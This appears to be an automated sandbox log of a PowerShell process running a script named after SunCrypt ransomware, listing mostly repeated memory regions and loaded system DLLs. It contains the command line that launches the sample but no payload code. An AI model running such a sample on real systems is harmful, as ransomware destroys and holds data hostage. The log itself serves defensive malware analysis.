# Flog Txt Version 1
# Analyzer Version: 4.4.0
# Analyzer Build Date: Dec 8 2021 20:04:45
# Log Creation Date: 27.12.2021 17:23:42.028

Process:
    id = "1"
    image_name = "powershell.exe"
    filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
    page_root = "0x7ef47400"
    os_pid = "0xfac"
    os_integrity_level = "0x3000"
    os_privileges = "0x60800000"
    monitor_reason = "analysis_target"
    parent_id = "0"
    os_parent_pid = "0x4ec"
    cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -File \"C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1\" "
    cur_dir = "C:\\Windows\\system32\\"
    os_username = "MYB7ZA2AF\\5AlR3U30D3"
    bitness = "32"
    os_groups = "MYB7ZA2AF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e73d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
    id = 253
    start_va = 0x10000
    end_va = 0x2ffff
    monitored = 1
    entry_point = 0x0
    region_type = private
    name = "private_0x0000000000010000"
    filename = ""
Region:
    id = 254
    start_va = 0x30000
    end_va = 0x33fff
    monitored = 1
    entry_point = 0x0
    region_type = pagefile_backed
    name = "pagefile_0x0000000000030000"
    filename = ""
Region:
    id = 255
    start_va = 0x40000
    end_va = 0x7ffff
    monitored = 1
    entry_point = 0x0
    region_type = private
    name = "private_0x0000000000040000"
    filename = ""
Region:
    id = 256
    start_va = 0x80000
    end_va = 0x80fff
    monitored = 1
    entry_point = 0x0
    region_type = pagefile_backed
    name = "pagefile_0x0000000000080000"
    filename = ""
Region:
    id = 257
    start_va = 0xd80000
    end_va = 0xdeafff
    monitored = 0
    entry_point = 0xd8d330
    region_type = mapped_file
    name = "powershell.exe"
    filename =
"\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 258 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 259 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 260 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 261 start_va = 0x7ffd7000 end_va = 0x7ffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 262 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 263 start_va = 0x90000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 264 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 265 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 266 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 267 start_va = 0x7f6f0000 end_va = 0x7f7effff 
monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 268 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 269 start_va = 0x90000 end_va = 0xf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 270 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 271 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 272 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 273 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 274 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 275 start_va = 0x73bf0000 end_va = 0x73c03fff monitored = 0 entry_point = 0x73bf1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 276 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = 
"user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 277 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 278 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 279 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 280 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 281 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 282 start_va = 0x6fb70000 end_va = 0x6fbb9fff monitored = 1 entry_point = 0x6fb72e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 283 start_va = 0x100000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 284 start_va = 0x100000 end_va = 0x1c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 285 start_va = 0x1d0000 end_va = 0x1ecfff monitored = 0 entry_point = 0x1d1355 region_type = mapped_file name = "imm32.dll" 
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 286 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 287 start_va = 0x1d0000 end_va = 0x1ecfff monitored = 0 entry_point = 0x1d1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 288 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 289 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 290 start_va = 0x370000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 291 start_va = 0xdf0000 end_va = 0x19effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 292 start_va = 0x1d0000 end_va = 0x1d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 293 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 294 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 295 start_va = 0x480000 end_va = 0x55ffff monitored = 1 
entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 296 start_va = 0x200000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 297 start_va = 0x480000 end_va = 0x4dbfff monitored = 0 entry_point = 0x4a35b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 298 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 299 start_va = 0x480000 end_va = 0x4dbfff monitored = 0 entry_point = 0x4a35b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 300 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 301 start_va = 0x74870000 end_va = 0x748affff monitored = 0 entry_point = 0x7487a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 302 start_va = 0x560000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 303 start_va = 0x640000 end_va = 0x71efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 304 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 305 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" 
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 306 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 307 start_va = 0x76a80000 end_va = 0x776c9fff monitored = 0 entry_point = 0x76b01601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 308 start_va = 0x75fa0000 end_va = 0x75ff6fff monitored = 0 entry_point = 0x75fb9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 309 start_va = 0x74eb0000 end_va = 0x74ec6fff monitored = 0 entry_point = 0x74eb1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 310 start_va = 0x75810000 end_va = 0x7581afff monitored = 0 entry_point = 0x75811992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 311 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 312 start_va = 0x744d0000 end_va = 0x7466dfff monitored = 0 entry_point = 0x744fe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 313 start_va = 0x490000 end_va = 0x490fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = 
"\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 314 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 315 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 316 start_va = 0x720000 end_va = 0x9eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 317 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 318 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 319 start_va = 0x74a20000 end_va = 0x74b14fff monitored = 0 entry_point = 0x74a30d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 320 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 321 start_va = 0x75c50000 end_va = 0x75decfff monitored = 0 entry_point = 0x75c517e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 322 start_va = 0x75a80000 end_va = 0x75aa6fff monitored = 0 entry_point = 0x75a858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 323 start_va = 0x75b00000 end_va = 0x75b11fff monitored = 0 entry_point = 
0x75b01441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 324 start_va = 0x4b0000 end_va = 0x4bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 325 start_va = 0x74c10000 end_va = 0x74c30fff monitored = 0 entry_point = 0x74c1145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 326 start_va = 0x778b0000 end_va = 0x778f4fff monitored = 0 entry_point = 0x778b11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 327 start_va = 0x4c0000 end_va = 0x4c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 328 start_va = 0x4d0000 end_va = 0x4e5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 329 start_va = 0xb60000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 330 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdd000" filename = "" Region: id = 331 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 332 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 333 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 334 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 335 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 336 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 337 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 338 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 339 start_va = 0x9f0000 end_va = 0xa4bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 340 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 341 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 342 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = 
private name = "private_0x0000000000a50000" filename = "" Region: id = 343 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 344 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 345 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 346 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 347 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 348 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 349 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 350 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 351 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 352 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 353 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 354 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 355 start_va = 
0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 356 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 357 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 358 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 359 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 360 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 361 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 362 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 363 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 364 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 365 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 366 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 367 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = 
"private_0x0000000000a50000" filename = "" Region: id = 368 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 369 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 370 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 371 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 372 start_va = 0x71fa0000 end_va = 0x71febfff monitored = 0 entry_point = 0x71fa2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 373 start_va = 0x70670000 end_va = 0x7069dfff monitored = 0 entry_point = 0x70671bba region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 374 start_va = 0xa50000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 375 start_va = 0x70660000 end_va = 0x70668fff monitored = 0 entry_point = 0x7066153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 376 start_va = 0x4c0000 end_va = 0x4c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 377 start_va = 0x500000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = 
"{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000008.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000008.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000008.db") Region: id = 378 start_va = 0x530000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 379 start_va = 0xba0000 end_va = 0xc05fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 380 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 381 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 382 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 383 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 384 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 385 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: 
id = 386 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 387 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 388 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 389 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 390 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 391 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 392 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 393 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 394 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 395 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 396 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 397 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 398 start_va = 0x70a40000 end_va = 0x70aaffff monitored = 0 entry_point = 0x70a41f65 
